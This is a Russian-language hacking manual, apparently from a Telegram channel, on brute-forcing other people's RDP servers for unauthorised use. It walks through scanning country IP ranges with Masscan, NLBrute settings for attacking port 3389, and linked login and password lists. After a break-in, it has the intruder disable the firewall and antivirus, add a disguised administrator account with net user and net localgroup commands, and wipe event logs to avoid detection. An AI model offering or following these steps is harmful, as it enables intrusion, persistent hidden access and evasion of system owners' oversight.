Мануал по бруту дедиков

Что нужно, чтобы начать?

1) Во-первых, нужна машина, с которой будем делать брут и скан диапазонов. Это может быть мощный сервер, впс или уже купленный дедик. Ни в коем случае не юзайте свой комп;

2) Список IP-диапазонов нужных стран;

3) Софт для парсинга IP-диапазонов;

4) Софт для брута дедиков;

5) Логины и пароли для брута аля словари.

Конфиг

У каждого софта есть свои минимальные требования к железу. Очень важным параметром является скорость канала. Подойдёт от 20мб/с, в идеале нужен 1Gb.

Список IP-диапазонов 

Выбираем нужную страну, копируем список, вставляем в сканер (например в Masscan).

http://www.find-ip-address.org/ip-country/

https://www.countryipblocks.net/country_selection.php

http://www.proxyserverprivacy.com/ipaddress_range.php

http://www.ipaddresslocation.org/ip_ranges/get_ranges.php

Софт для парсинга IP-диапазонов

Наверно, каждый знает про Masscan – это самый оптимальный вариант. Для удобства будем использовать GUI для Windows. Также перед парсингом нужно будет установить программу Winpcap, без неё не будет работать скан.

Настройка очень простая, загружаем IP-диапазоны, выбираем количество потоков, нужный порт, нажимаем Scan и уходим по своим делам. Чем больше диапазонов, тем дольше будет парсинг. Может занять несколько дней, если диапазоны включают несколько стран. Парсинг диапазонов и брут дедиков это разные вещи.

Софт для брута

У каждого софта свои плюсы, поэтому давайте просто рассмотрим на примере NLBrute.

Запускаем софт. Переходим на вкладку "WORK FILES". В поле "Servers" выбираем IP-адреса c нужным нам портом. Поле "Users" – логины, "Passwords" – пароли, и нажимаем Generate. Теперь переходим на вкладку "SETTINGS" и ставим такие параметры:

1) Max attempts (2) – количество попыток подключений к дедику;

2) Thread count (900) – количество потоков;

3) Time(out 50) – таймаут;

4) Default port (3389) – порт.

После настроек во вкладке "BRUTE" нажимайте Start. Если дедик, например, перезагрузился, то в программе можно нажать кнопку Continue и брут продолжится с того момента, на котором закончился.

Good count – количество сбрученых дедиков.

Logins:Passwords 

Логины не чувствительны к регистру, т.е. без разницы admin или ADmiN. Плюс ко всему, логин "Администратор" в разных странах пишется по-разному. Например:

Испания – Administrador;

Германия – Verwalter;

Франция – administrateur.

Есть софт, который определяет логины на дедике аля рекогнайзер. Один их них RDP Forcer. Загружаете только список паролей и брутите.

Сбрутили дедики. Что дальше?

Заходим на дедик. Отключаем фаервол и антивирус, если они там есть. Самый оптимальный вариант – это создать свою учётку. Нажмите Win+X, появится контекстное меню, в котором выбираем пункт "Командная строка (администратор)", после чего вводим:

net user LOGIN PASSWORD /add

net localgroup Administrators LOGIN /add

net localgroup "Remote Desktop Users" LOGIN /add

net accounts /maxpwage:unlimited

LOGIN – наш логин. Используйте системные имена типа network, winsystem и т.п чтобы админ не спалил.

PASSWORD – Наш пароль.

После чего выходим с админ учётки и логинимся через новый логин. Если не получается создать свою учётку, воспользуйтесь программой xDedic RDP Patch.

Список логинов: https://pastebin.com/nvRzD8JY

Список паролей: https://pastebin.com/i69fbKJt

Советы

1) Брать сервер для брута стоит лучше в той стране, в который Вы собираетесь брутить дедики. Не логично брать, например, сервер в Польше и брутить дедики в Австралии. Берите сервер в нужном регионе.

2) Удаление следов аля логов. В архиве есть файл clear.cmd. Каждый раз перед выходом с дедика запускайте скрипт через администратора, он чистит все журналы и логи.

3) Cleaners. Часто бывает, что попадается дедик с маленьким количеством ОЗУ, либо тормозящих дедик. В данной ситуации нам поможет программа Mem Reduct. Она очищает память через заданный промежуток времени, например каждые 5 минут. Помогает снизить нагрузку на софт. Для чистки системы можете использовать CCleaner + CCEnhancer либо BleachBit. Это лучшие программы в данной категории.

4) Порты. Часто админы меняют порт под RPD с 3389 на другие, нестандартные, такие как 3390, 3392, 3393, 3444 и другие. Используйте диапазоны 3350 - 3500.

💻Hacker News💻 [Life-Hack]🖥 – Выбери правильную сторону своего разума...